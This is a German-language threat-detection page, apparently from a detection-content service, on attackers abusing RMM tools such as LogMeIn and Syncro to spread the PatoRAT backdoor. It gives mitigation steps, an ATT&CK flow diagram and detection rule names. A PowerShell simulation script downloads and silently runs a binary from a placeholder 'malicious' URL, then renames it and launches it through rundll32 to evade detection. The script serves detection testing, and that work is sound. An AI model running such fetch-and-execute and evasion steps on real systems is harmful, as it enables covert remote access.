Folgen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure missbrauchen zunehmend legitime Remote-Monitoring- und Management (RMM)-Tools – wie LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne und SuperOps -, um Malware zu verbreiten und dauerhaften Fernzugriff zu etablieren. Die anfängliche Auslieferung erfolgt oft über bösartige Download-Seiten oder Phishing-E-Mails, gefolgt von einer Ausführung über PowerShell und der Bereitstellung sekundärer Nutzlasten wie der PatoRAT-Backdoor. AhnLab EDR kann die Ausführung dieser RMM-Dienstprogramme erkennen und verhaltensbasierte Warnungen zu verdächtigen Folgeaktivitäten generieren. Der Bericht unterstreicht die Bedeutung der Validierung der Software-Herkunft und der kontinuierlichen Endpunktüberwachung.
Untersuchung
Das AhnLab Security Intelligence Center beobachtete mehrere Kampagnen, in denen Angreifer RMM-Installer als beliebte Anwendungen (zum Beispiel Notepad++, 7-Zip und Telegram) neu verpackten oder verschleierten und sie über bösartige Websites oder Phishing-Anhänge verbreiteten. Nach der Installation registrierten sich die RMM-Agents bei ihrer Herstellerinfrastruktur und wurden dann verwendet, um PowerShell-Nutzlasten auszuführen, die PatoRAT ablegten. Ähnliche Techniken erschienen bei mehreren RMM-Produkten, einschließlich Syncro, das über Phishing mit PDF-Ködern verbreitet wurde. AhnLab EDR-Erkennungslogik wurde entwickelt, um die Ausführung dieser an sich legitimen Binärdateien zu markieren und sie mit Verhaltensweisen nach der Installation zu korrelieren.
Minderung
Überprüfen Sie die Download-Quellen, validieren Sie die Code-Signatur-Zertifikate und vergleichen Sie die Hashes mit offiziellen Anbieter-Veröffentlichungen, bevor Sie RMM-Software in der Umgebung zulassen. Erzwingen Sie eine Anwendungsliste und erfordern Sie ausdrückliche Genehmigungen für die Ausführung von RMM. Überwachen Sie unerwartete RMM-Binärstartvorgänge, anomale PowerShell-Aktivitäten und verdächtige Verbindungen zu Anbieter-Infrastrukturdomainen, wenn solche Tools nicht genehmigt sind. Halten Sie Betriebssysteme und Sicherheitswerkzeuge auf dem neuesten Stand, um die Exposition zu reduzieren.
Reaktion
Wenn eine verdächtige RMM-Ausführung festgestellt wird, isolieren Sie den Host, sammeln Sie forensische Artefakte und entfernen Sie das unbefugte Binärprogramm. Blockieren Sie ausgehende Verbindungen zur Infrastruktur des Tools, um Fernsteuerungskanäle abzuschneiden, und führen Sie einen vollständigen Scan nach sekundären Nutzlasten wie PatoRAT durch. Aktualisieren Sie die Erkennungsinhalte mit beobachteten IOCs und informieren Sie das SOC über die Kampagnenmuster für schnellere Triagen.
„graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Nodes node_initial_access[„<b>Aktion</b> – <b>T1204 Benutzeraktion</b>: Opfer laden RMM-Installer herunter, die als legitime Software getarnt sind oder öffnen Phishing-PDF-Rechnungen, die zu bösartigen Links umleiten.“] class node_initial_access action node_masquerading[„<b>Technik</b> – <b>T1036.008 Verschleierung</b>: Installer und PDFs werden gefälscht, um wie vertrauenswürdige Dienstprogramme oder Dokumente auszusehen.“] class node_masquerading technique node_rmt_install[„<b>Tool</b> – <b>Name</b>: Remote-Access-Tools wie LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps.“] class node_rmt_install tool node_powerShell[„<b>Technik</b> – <b>T1059.001 PowerShell</b>: Angreifer führen PowerShell-Befehle über die RMM-Plattform aus, um die PatoRAT-Backdoor herunterzuladen und zu installieren.“] class node_powerShell technique node_patoRAT[„<b>Malware</b> – <b>Name</b>: PatoRAT-Backdoor.“] class node_patoRAT malware node_software_deployment[„<b>Technik</b> – <b>T1072 Software-Deployment-Tools</b>: RMM-Lösungen werden genutzt, um zusätzliche bösartige Nutzlasten zu verteilen und Persistenz aufrechtzuerhalten.“] class node_software_deployment technique node_lateral_exploit[„<b>Technik</b> – <b>T1210 Ausnutzung von Remote-Diensten</b>: Kompromittierte RMM-Tools werden verwendet, um Remote-Sitzungen zu öffnen und sich lateral durch die Umgebung zu bewegen.“] class node_lateral_exploit technique node_rdp_hijack[„<b>Technik</b> – <b>T1563.002 RDP-Service-Sitzungskapern</b>: RDP-Kapern wird durchgeführt, um die Kontrolle über zusätzliche Hosts zu erlangen.“] class node_rdp_hijack technique node_root_cert[„<b>Technik</b> – <b>T1553.004 Installieren von Root-Zertifikat</b>: PowerShell-Befehle installieren ein bösartiges Root-Zertifikat, um Sicherheitskontrollen zu umgehen.“] class node_root_cert technique %% Connections node_initial_access u002du002d>|führt zu| node_masquerading node_masquerading u002du002d>|führt zu| node_rmt_install node_rmt_install u002du002d>|verwendet| node_powerShell node_powerShell u002du002d>|installiert| node_patoRAT node_patoRAT u002du002d>|ermöglicht| node_software_deployment node_software_deployment u002du002d>|erleichtert| node_lateral_exploit node_lateral_exploit u002du002d>|ermöglicht| node_rdp_hijack node_powerShell u002du002d>|führt aus| node_root_cert „
Angriffsablauf
Erkennungen
Alternative Remote-Access- / Management-Software (via process_creation)
Anzeigen
Versuch einer möglichen SuperOps RMM-Softwareinstallation (via file_event)
Anzeigen
Alternative Remote-Access- / Management-Software (via audit)
Anzeigen
Alternative Remote-Access- / Management-Software (via system)
Anzeigen
Erkennung der Ausnutzung des RMM-Tools zur Malware-Verteilung [Windows Prozess-Erstellung]
Anzeigen
Simulation-Ausführung
Voraussetzung: Der Telemetrie- und Basis-Preflight-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Umsetzung der vom Gegner verwendeten Technik (TTP), die zur Auslösung der Erkennungsregel bestimmt ist. Die Befehle und das Narrativ MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
Ein Angreifer liefert eine Phishing-E-Mail mit einem bösartigen Anhang. Der Anhang führt ein PowerShell-Skript aus, das das RMM-Binärprogramm herunterlädtLogMeIn.exetoC:Temp. Um die namensbasierte Erkennung zu umgehen, benennt der Angreifer das Binärprogramm umtool.exeund startet es überrundll32.exe(T1216). Das RMM-Binärprogramm kontaktiert dann den vom Angreifer kontrollierten C2-Server und legt eine Backdoor-Nutzlast ab. Nach der Ausführung löscht der Angreifer das Binärprogramm (T1542.004), um Spuren zu verwischen. -
Regressionstest-Skript:
# --------------------------------------------------------------- # Simulieren der Ausnutzung des RMM-Tools (Originalname) – sollte auslösen # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Ausführen des originalen RMM-Binärprogramms (Alarmauslösung erwarten)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simulation der Umgehung durch Umbenennung und Proxy-Ausführung – sollte NICHT auslösen # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Umbenanntes RMM-Binärprogramm über rundll32 ausführen (Umgehung)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Bereinigung von Artefakten # --------------------------------------------------------------- Write-Host "[*] Bereinigen von Binärdateien..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulation abgeschlossen." -
Bereinigungskommandos:
# Sicherstellen, dass übrig gebliebene Prozesse beendet werden Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Entfernen heruntergeladener Dateien (falls sie noch existieren) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue